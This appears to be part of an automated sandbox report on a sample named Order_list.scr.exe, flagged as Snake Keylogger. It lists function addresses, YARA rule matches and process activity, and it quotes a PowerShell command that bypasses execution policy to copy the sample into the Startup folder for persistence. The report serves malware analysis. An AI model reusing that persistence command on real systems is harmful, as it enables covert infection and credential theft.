            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635D6708_2_0635D670
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635AA588_2_0635AA58
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635B6E88_2_0635B6E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635C3888_2_0635C388
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635D0288_2_0635D028
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635A4088_2_0635A408
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06358C608_2_06358C60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635B0A08_2_0635B0A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635BD388_2_0635BD38
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063511A08_2_063511A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635C9D88_2_0635C9D8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635322A8_2_0635322A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063556188_2_06355618
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063586028_2_06358602
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635560A8_2_0635560A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06355A708_2_06355A70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06355A608_2_06355A60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635D6628_2_0635D662
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635F26C8_2_0635F26C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635AA488_2_0635AA48
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635F2B38_2_0635F2B3
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06355EB88_2_06355EB8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635F2FF8_2_0635F2FF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635B6D98_2_0635B6D9
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06355EC88_2_06355EC8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063537308_2_06353730
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063563208_2_06356320
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063537208_2_06353720
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063563128_2_06356312
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063567788_2_06356778
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635C3788_2_0635C378
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06358B588_2_06358B58
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063533B88_2_063533B8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063533A88_2_063533A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635A3F88_2_0635A3F8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06356BD08_2_06356BD0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06356BC18_2_06356BC1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063544308_2_06354430
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063544208_2_06354420
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635F42E8_2_0635F42E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635D0188_2_0635D018
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063528078_2_06352807
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063500068_2_06350006
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063528098_2_06352809
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063570508_2_06357050
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063500408_2_06350040
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063570498_2_06357049
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063528B08_2_063528B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063574A88_2_063574A8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063574978_2_06357497
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063504988_2_06350498
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635B08F8_2_0635B08F
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063504888_2_06350488
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063508F08_2_063508F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063578F08_2_063578F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635F0E68_2_0635F0E6
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063508E08_2_063508E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06350D398_2_06350D39
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635BD288_2_0635BD28
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063579008_2_06357900
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06357D588_2_06357D58
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06350D488_2_06350D48
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_06357D488_2_06357D48
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063581B08_2_063581B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063581A08_2_063581A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063511918_2_06351191
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_063551988_2_06355198
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635518A8_2_0635518A
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeCode function: 8_2_0635C9C88_2_0635C9C8
            Source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000000.00000002.4142462023.0000000002611000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000000.00000002.4164055265.00000000036A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000000.00000002.4137589994.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000000.00000002.4171576105.0000000004DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000000.00000000.1676222262.0000000000242000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFisa.exe* vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000003.00000002.4136341047.00000000011D7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Order_list.scr.exe
            Source: Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Order_list.scr.exe
            Source: Order_list.scr.exeBinary or memory string: OriginalFilenameFisa.exe* vs Order_list.scr.exe
            Source: Order_list.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.Order_list.scr.exe.29590ec.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Order_list.scr.exe.4d40000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Order_list.scr.exe.4d40000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Order_list.scr.exe.3668570.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0.2.Order_list.scr.exe.29568ac.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.00.exe.2c76d58.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.00.exe.2c79598.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.4170463364.0000000004D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: classification engineClassification label: mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wamnlfk.cxk.ps1Jump to behavior
            Source: Order_list.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Order_list.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\Order_list.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Order_list.scr.exe, 00000003.00000002.4141697018.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003518000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003509000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000297B000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002989000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000296B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Order_list.scr.exeReversingLabs: Detection: 63%
            Source: unknownProcess created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\Order_list.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeProcess created: C:\Users\user\Desktop\Order_list.scr.exe "C:\Users\user\Desktop\Order_list.scr.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe'Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
